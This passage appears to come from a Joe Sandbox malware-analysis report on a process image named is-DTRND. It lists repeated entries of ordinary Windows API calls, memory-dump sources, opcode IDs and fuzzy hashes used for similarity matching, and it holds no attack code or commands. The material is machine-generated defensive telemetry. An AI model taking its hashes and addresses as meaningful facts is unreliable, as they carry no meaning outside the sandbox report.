                                          • Instruction Fuzzy Hash: 18E012B63442183ED380EEAC6C81FA777DC970D764F048477F998D7281D57199158BB8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FormatMessage
                                          • String ID:
                                          • API String ID: 1306739567-0
                                          • Opcode ID: d8d863c8c55bd2bd23141fa6b36e162dd74dea1a6aeec0f79b4d400c45e841d5
                                          • Instruction ID: 30a6d8b6a2b2d4fcd76e97f60023192a96504a1e546af8f0f62a001159190bce
                                          • Opcode Fuzzy Hash: d8d863c8c55bd2bd23141fa6b36e162dd74dea1a6aeec0f79b4d400c45e841d5
                                          • Instruction Fuzzy Hash: 40E020B139472236F23500A76C4BF7F260D47D0700FA440267B11DE3D2D9EEE906019D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 328f01d9cbf36e17bdfe892db5b50aef09e64cadae7b24705b832a9b704e87e0
                                          • Instruction ID: f82a7914c31c63950c7971c7dc1cc064c3e673ecb44ced4aa894877575ddc420
                                          • Opcode Fuzzy Hash: 328f01d9cbf36e17bdfe892db5b50aef09e64cadae7b24705b832a9b704e87e0
                                          • Instruction Fuzzy Hash: 6CE075B2600119AF9B40DE8DDC41EEB37ADAB1D350B404026FA08D7200C274EC519BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindClose.KERNEL32(00000000,000000FF,00468E7E,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000), ref: 004534AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 6715253817c5446c6029b6eac7d795c38f3317e9480a1568d90ee15279b25660
                                          • Instruction ID: 25e08a3a2396fdb50ec6365b92d55a3c498184e9eaf3c6780c29ae4bfb0144ce
                                          • Opcode Fuzzy Hash: 6715253817c5446c6029b6eac7d795c38f3317e9480a1568d90ee15279b25660
                                          • Instruction Fuzzy Hash: FBE09BB0A046048BCB15CF39848131677D15F89361F08CA6AAC5CCB3D7E73C84055667
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0048864A,?,0048866A,?,?,00000000,0048864A,?,?), ref: 00414763
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406FB8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: f6c1aad4a8904306a7b9da86c6f5227892e9131e9cd6accf8a849aea266828c0
                                          • Instruction ID: 094b55ea42a2d669888ebe979cb1588c753d9803ef852f165be57089eabc71c4
                                          • Opcode Fuzzy Hash: f6c1aad4a8904306a7b9da86c6f5227892e9131e9cd6accf8a849aea266828c0
                                          • Instruction Fuzzy Hash: 18D05B723082107AE224955B6D84EAB5BDCCBC5770F11063EF568D71C1D6308C058775
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004236C0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 004236D5
                                          • ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F
                                            • Part of subcall function 004236F0: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042370C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$ShowWindow
                                          • String ID:
                                          • API String ID: 3202724764-0
                                          • Opcode ID: 770afa24fe7550dadab928d38750dae13ac9c0c6fd680db7553044468440b3c9
                                          • Instruction ID: acb803ed99d8a779adfd935bf79fac66e91ef2ff7e35841efc32692bfe1f30af
                                          • Opcode Fuzzy Hash: 770afa24fe7550dadab928d38750dae13ac9c0c6fd680db7553044468440b3c9
                                          • Instruction Fuzzy Hash: AFD0A7923812702187307EBB3846A9B52BC4DD22E7388483FB550C7303ED9D8E0210BC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowTextA.USER32(?,00000000), ref: 004243A4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID:
                                          • API String ID: 530164218-0
                                          • Opcode ID: 5766a25384be28116e18b02812b6949491dca06ef70728af85351d8e04794ef0
                                          • Instruction ID: 37361632d4d514c50c0f5b3b94c48c5e4f37ef369a7246e00f52f19e18fb69a1
                                          • Opcode Fuzzy Hash: 5766a25384be28116e18b02812b6949491dca06ef70728af85351d8e04794ef0
                                          • Instruction Fuzzy Hash: 74D012A270013027C701BAA95484A8567CC4B8925671540ABF904D7296C6388A404358
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00461704,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460AA4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A98C,0040CF38,?,?,00000000), ref: 00406F71
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 433f440210a344e7a3304f08861641889f46d5e1c7f71bb4f49350f7bdef092c
                                          • Instruction ID: fbf433f388ee34c674fb7f0d47a908a919ece7d44da589a3048eb8b88fcd3b6d
                                          • Opcode Fuzzy Hash: 433f440210a344e7a3304f08861641889f46d5e1c7f71bb4f49350f7bdef092c
                                          • Instruction Fuzzy Hash: 16C048A138030032F92026B60C87F2600885704F19E64857AB784BE1C2C8E9A808011C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 004321CC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: df445557e7b044264c1bd33c4ff95ea1a8a72b63f89f17b380f8b90f7f5f6f80
                                          • Instruction ID: 9b37a0a06ce19e8ef19df0e59975e005822ebcec00dd204071a81c40df8ba161
                                          • Opcode Fuzzy Hash: df445557e7b044264c1bd33c4ff95ea1a8a72b63f89f17b380f8b90f7f5f6f80
                                          • Instruction Fuzzy Hash: 80D067B49062048AD340BF69A985B0C3BA0A74E74CFA0993FE508A62A1D77954499F1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetEndOfFile.KERNEL32(?,00000000,0046730A), ref: 0045010B
                                            • Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast
                                          • String ID:
                                          • API String ID: 734332943-0
                                          • Opcode ID: 7f2d6b46b854857be2457e499f427f7ef468b9c3465d519b02ef8c24fe06530d
                                          • Instruction ID: 8ba7de62c0f8f2b826c565226acfba955b7b40c9ce9c5bc33c07dfd11b4ca65a
                                          • Opcode Fuzzy Hash: 7f2d6b46b854857be2457e499f427f7ef468b9c3465d519b02ef8c24fe06530d
                                          • Instruction Fuzzy Hash: A2C09B6530061547DF00E6BEC9C1A0777EC5F593053104077F918CF217E769EC084729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,0048AA46,00000000,0048ABE3,?,?,00000005,00000000,0048AC17,?,?,00000000), ref: 00407347
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory
                                          • String ID:
                                          • API String ID: 1611563598-0
                                          • Opcode ID: 2fbdcd1769973cdfba2b5d519fc1f3131b777102045368f03a3cadaf0bd6878e
                                          • Instruction ID: 896aec1077dce6a9c9566130b3b637ad8921e49b9395fb70f53529d07e155150
                                          • Opcode Fuzzy Hash: 2fbdcd1769973cdfba2b5d519fc1f3131b777102045368f03a3cadaf0bd6878e
                                          • Instruction Fuzzy Hash: F2B012F13A030A1ACE007AFE4CC191604DC464C3163401B7E7006E71C3DD3CE508001C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(?,0042E2C9), ref: 0042E2BC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 0b6356324c10b9c5315b82fe1bd37e37c079b3f508247d09bf8e24882e174b41
                                          • Instruction ID: d44268c39032d66eb9059e67749796375290d63107054dc34eb47e6ccc5263f2
                                          • Opcode Fuzzy Hash: 0b6356324c10b9c5315b82fe1bd37e37c079b3f508247d09bf8e24882e174b41
                                          • Instruction Fuzzy Hash: 1EB09B7A70C6009DEB0997D7B41551973E8D7C47103F148B7F000D6580D57C6400463C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: E69840
                                          • String ID:
                                          • API String ID: 4204705538-0
                                          • Opcode ID: da20a264590b8da76bcc673a24629bda81143ece4f0058ab807c22f450b41b4b
                                          • Instruction ID: e9a41f564f419c910e8f91a975f78234a4d9e50f6d6e429a21b41bd5f0bff929
                                          • Opcode Fuzzy Hash: da20a264590b8da76bcc673a24629bda81143ece4f0058ab807c22f450b41b4b
                                          • Instruction Fuzzy Hash: 46A002655016019ADE04B7B5888DF662298BB48208FCD05F971049B052C53C94008A18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e35ca788a800f441d4abc29cdf2e714a1d2045ec6d2750f6368b2cacc4690ae
                                          • Instruction ID: 5d73c6f8daca525de1b34ad835d17be6b4db68b1b7569b0a0447b861dcc13144
                                          • Opcode Fuzzy Hash: 1e35ca788a800f441d4abc29cdf2e714a1d2045ec6d2750f6368b2cacc4690ae
                                          • Instruction Fuzzy Hash: 2A5183B0A005099FEB01EFA9C882AAFBBF5EF48314F50447AE500E7351DA789D45CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016ED
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
                                          • Instruction ID: 8e25b90ae9f864962d718719b52cc57e6420d8e0f8478eb6e4e12427a5fbc1b4
                                          • Opcode Fuzzy Hash: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
                                          • Instruction Fuzzy Hash: 76117CB2A057059FC3109F29CC80A2BB7E2EBC4765F15C93DE598AB3A5D635AC408789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EE6C,?,00423957,00423CD4,0041EE6C), ref: 0041F4AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 402590cf4b5d7f110bb94798805d05b5fec5b95a2efd47f6f4f18a6dc87802f2
                                          • Instruction ID: 42afb4f221658e7fb89e2175542a32d299b5515218ded37e71f0002ca044b13b
                                          • Opcode Fuzzy Hash: 402590cf4b5d7f110bb94798805d05b5fec5b95a2efd47f6f4f18a6dc87802f2
                                          • Instruction Fuzzy Hash: 28117C746403059FC710EF19D880B86F7E5EF98350F10C93AE9989B396D378E949CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040197B), ref: 0040176E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
                                          • Instruction ID: 513dc5185c5ea873f64aca2166fc8996875178c568a1f6713369453d53051677
                                          • Opcode Fuzzy Hash: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
                                          • Instruction Fuzzy Hash: 9401F776A452144FC310AE28DCC0E2A77A5DB84724F15453DEE84A7391D33A6C0687A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000000,00451AD1), ref: 00451AB3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 9a2442602f04fca4c12d272be6812ac72593b6de9992ca1bcbe19b3311dd92df
                                          • Instruction ID: 6fba9e0342ff494ad0917aee243d04831ce01c0435d3168b0008c0cc2e51abc3
                                          • Opcode Fuzzy Hash: 9a2442602f04fca4c12d272be6812ac72593b6de9992ca1bcbe19b3311dd92df
                                          • Instruction Fuzzy Hash: 5D014C356046046A8B01DF6A98405EEF7E8DB49320B2082B7FC14D3762D6344D059664
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
